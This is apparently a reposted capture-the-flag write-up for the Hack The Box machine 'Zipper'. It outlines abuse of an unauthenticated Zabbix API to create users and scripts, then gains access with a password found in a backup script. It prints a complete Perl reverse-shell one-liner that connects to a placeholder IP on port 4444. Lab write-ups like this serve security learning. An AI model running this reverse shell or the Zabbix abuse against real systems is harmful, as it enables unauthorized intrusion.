HTB-靶机 Zipper-Writeup

华盟原创文章投稿奖励计划

Usually scan,nmap+dirb+gobuster+msftcp
HTB-靶机 Zipper-Writeup
HTB-靶机 Zipper-Writeup
HTB-靶机 Zipper-Writeup
HTB-靶机 Zipper-Writeup

find zabbix,ver3.0.21:

HTB-靶机 Zipper-WriteupHTB-靶机 Zipper-Writeup
think about zabbix has jsrpc.php,any exploit?,json interface is not authorized to access,search it:
HTB-靶机 Zipper-Writeup
python has library named zabbixapi,https://github.com/lukecyca/pyzabbix
EXP. add host:http://blog.chinaunix.net/uid-28309325-id-5176638.html
createuser.py:

HTB-靶机 Zipper-Writeup
HTB-靶机 Zipper-Writeup
createscript.py:
The execute script must execute on zabbix agent not on server cuz server its a docker container

HTB-靶机 Zipper-Writeup

the panel of script before:
HTB-靶机 Zipper-Writeup

after excute the script:

HTB-靶机 Zipper-Writeup

editor the script,use the stable perl or python to backconnect:
perl-e'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'<br />
create events or triggers,filter use any,more hosts possible:
HTB-靶机 Zipper-Writeup

ncat to listen:
HTB-靶机 Zipper-Writeup
HTB-靶机 Zipper-Writeup

find the files of user zapper is permission denied,cat the backup.sh:
/usr/bin/7z a /backups/zapper_backup-$(/bin/date +%F).7z -pZippityDoDah /home/zapper/utils/* &>/dev/null
shell for backup,-p could be the pwd for zapper
zapper can not ssh:
HTB-靶机 Zipper-Writeup

use python to get a interactive shell:
HTB-靶机 Zipper-Writeup
so can use su,input the pwd,login successfully:
HTB-靶机 Zipper-Writeup
get user.txt
search folder:
HTB-靶机 Zipper-Writeup
The only one that runs with root is the service. Actually, the administrator may be negligent. This should be the way to leave a question for us
suid is running by root
HTB-靶机 Zipper-Writeup
download the pdf of writeup

华盟知识星球入口

文章来源:lsh4ck's Blog

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/237678.html

发表评论